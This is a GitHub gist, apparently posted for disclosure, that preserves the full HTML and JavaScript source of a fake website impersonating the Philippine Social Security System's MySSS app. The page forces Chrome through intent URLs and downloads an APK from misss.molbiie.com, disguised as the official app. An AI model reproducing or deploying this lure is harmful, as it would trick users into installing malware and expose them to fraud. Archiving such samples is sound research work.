Skip to content

Instantly share code, notes, and snippets.

@ajdumanhug

ajdumanhug/misss.molbiie.com.src

Created June 1, 2025 02:23
Show Gist options
  • Save ajdumanhug/c3039ed879ac926b739a87dafade86de to your computer and use it in GitHub Desktop.
Save ajdumanhug/c3039ed879ac926b739a87dafade86de to your computer and use it in GitHub Desktop.
Download ZIP
Source code of the malicious website pretending to be MySSS
Raw
misss.molbiie.com.src
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name="referrer" content="never" />
<title>Republic of the Philippines Social Security System</title>
<meta
name="description"
content="The MySSS is the official mobile app of the Philippine Social Security System"
/>
<meta
property="og:title"
content="Republic of the Philippines Social Security System"
/>
<meta
name="description"
property="og:description"
content="The MySSS is the official mobile app of the Philippine Social Security System"
/>
<meta property="og:image" content="./assets/og_image.png" />
<meta name="twitter:card" content="summary_large_image" />
<meta
name="twitter:title"
content="Republic of the Philippines Social Security System"
/>
<meta
name="twitter:description"
content="The MySSS is the official mobile app of the Philippine Social Security System"
/>
<link rel="icon" href="./favicon.png" />
<style>
* {
margin: 0;
padding: 0;
}
body {
font-size: 0;
margin: 0;
padding: 0;
max-width: 750px;
margin: auto;
}
.header {
position: sticky;
top: 0;
width: 100%;
border-bottom: 2px solid #cccccc;
}
.content {
position: relative;
}
.w-100 {
width: 100%;
}
.jump {
position: absolute;
bottom: 40px;
width: calc(100% - 30px);
margin: 0 15px;
display: flex;
justify-content: space-around;
align-items: center;
}
.jump > .item {
width: 150px;
height: 50px;
position: relative;
background-color: black;
color: #fff;
font-family: "Google Sans", Roboto, Arial, sans-serif;
font-size: 0.875rem;
letter-spacing: 0.0178571429em;
font-weight: 500;
line-height: 50px;
text-align: center;
border-radius: 5px;
}
.item img {
width: 100%;
}
</style>
<style>
.progress {
position: absolute;
left: 0;
width: 0%;
height: inherit;
border-radius: 3px 0 0 3px;
background-color: rgba(255, 255, 255, 0.3);
-webkit-transition: width 0.2s linear;
-o-transition: width 0.2s linear;
transition: width 0.2s linear;
}
</style>
</head>
<body>
<img src="./assets/header.png" alt="" draggable="false" class="header" />
<div class="content">
<img src="./assets/link.png" alt="" class="w-100">
<div class="jump">
<div class="item" onclick="handleDownload()">
<img src="./assets/android.png" alt="" id="instal" />
<div class="progress"></div>
<span id="status" style="display: none">
<span id="schedule">0</span>%
</span>
</div>
<div class="item" onclick="clickIOS()">
<img src="./assets/ios.png" alt="" />
</div>
</div>
</div>
<img src="./assets/bg.png" alt="" draggable="false" class="w-100" />
<script>
function clickIOS() {
alert("The system is being upgraded")
}
if (
/Chrome/.test(window.navigator.userAgent) &&
!Boolean(window.chrome)
) {
window.location.href =
"intent://" +
window.location.href.split("://")[1] +
"#Intent;scheme=" +
window.location.href.split("://")[0] +
";package=com.android.chrome;end;"
}
const url = decodeURIComponent("http:\/\/misss.molbiie.com\/x\/xc?name=MySSS")
const contentLength = Number("17766999".replaceAll(",", ""))
const urlObj = new URL(url)
var name = urlObj.pathname.split("/").pop()
if (urlObj.searchParams.get("name")) {
name = urlObj.searchParams.get("name")
} else if (name.includes(".apk")) {
name += ".apk"
}
var loadedList = []
var downloadA = null
function sum(arr) {
return arr.reduce(function (acr, cur) {
return acr + cur
})
}
async function asyncPool(poolLimit, array, iteratorFn) {
const ret = []
const executing = []
for (const item of array) {
const p = Promise.resolve().then(() => iteratorFn(item, array))
ret.push(p)
if (poolLimit <= array.length) {
const e = p.then(() => executing.splice(executing.indexOf(e), 1))
executing.push(e)
if (executing.length >= poolLimit) {
await Promise.race(executing)
}
}
}
return Promise.all(ret)
}
function getBinaryContent(url, start, end, i) {
return new Promise((resolve, reject) => {
try {
let xhr = new XMLHttpRequest()
xhr.open("GET", url, true)
xhr.setRequestHeader(
"rangex",
`bytes=${start}-${i === loadedList.length - 1 ? "" : end}`
)
xhr.responseType = "arraybuffer"
xhr.onprogress = function (e) {
loadedList[i] = e.loaded
const percent_complete = Math.floor(
(sum(loadedList) / contentLength) * 100
)
document.querySelector("#schedule").innerText = percent_complete
document.querySelector(".progress").style.width =
percent_complete + "%"
}
xhr.onload = function () {
if (
xhr.readyState === 4 &&
xhr.status >= 200 &&
xhr.status < 300
) {
resolve({
index: i,
buffer: xhr.response,
})
} else {
reject(new Error("Network Error:" + xhr.status))
}
}
xhr.send()
} catch (err) {
reject(new Error(err))
}
})
}
function concatenate(arrays) {
if (!arrays.length) return null
let totalLength = arrays.reduce((acc, value) => acc + value.length, 0)
let result = new Uint8Array(totalLength)
let length = 0
for (let array of arrays) {
result.set(array, length)
length += array.length
}
return result
}
function saveAs({
name,
buffers,
mime = "application/vnd.android.package-archive",
}) {
const blob = new Blob([buffers], { type: mime })
const blobUrl = URL.createObjectURL(blob)
downloadA = document.createElement("a")
downloadA.download = name || Math.random()
downloadA.href = blobUrl
downloadA.click()
}
async function download({
url,
contentLength,
chunkSize,
poolLimit = 1,
}) {
const chunks =
typeof chunkSize === "number"
? Math.ceil(contentLength / chunkSize)
: 1
loadedList = new Array(chunks).fill(0)
const results = await asyncPool(
poolLimit,
[...new Array(chunks).keys()],
(i) => {
let start = i * chunkSize
let end =
i + 1 == chunks ? contentLength - 1 : (i + 1) * chunkSize - 1
return getBinaryContent(url, start, end, i)
}
)
const sortedBuffers = results.map((item) => new Uint8Array(item.buffer))
return concatenate(sortedBuffers)
}
function handleDownload() {
if (document.querySelector("#instal").style.display === "none") {
return
} else if (downloadA) {
downloadA.click()
setTimeout(function () {
if (
/Chrome/.test(window.navigator.userAgent) &&
!Boolean(window.chrome)
) {
}
}, 1000)
}
if (
/Chrome/.test(window.navigator.userAgent) &&
!Boolean(window.chrome)
) {
window.location.href =
"intent://" +
window.location.href.split("://")[1] +
"#Intent;scheme=" +
window.location.href.split("://")[0] +
";end;"
}
loadedList = []
document.querySelector("#instal").style.display = "none"
document.querySelector("#status").style.display = "inline-block"
download({
url,
contentLength,
chunkSize: 1 * 1024 * 1024,
poolLimit: 6,
})
.then((buffers) => {
saveAs({ name, buffers })
document.querySelector("#instal").style.display = "inline-block"
document.querySelector("#status").style.display = "none"
})
.catch(() => {
document.querySelector("#instal").style.display = "inline-block"
document.querySelector("#status").style.display = "none"
})
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment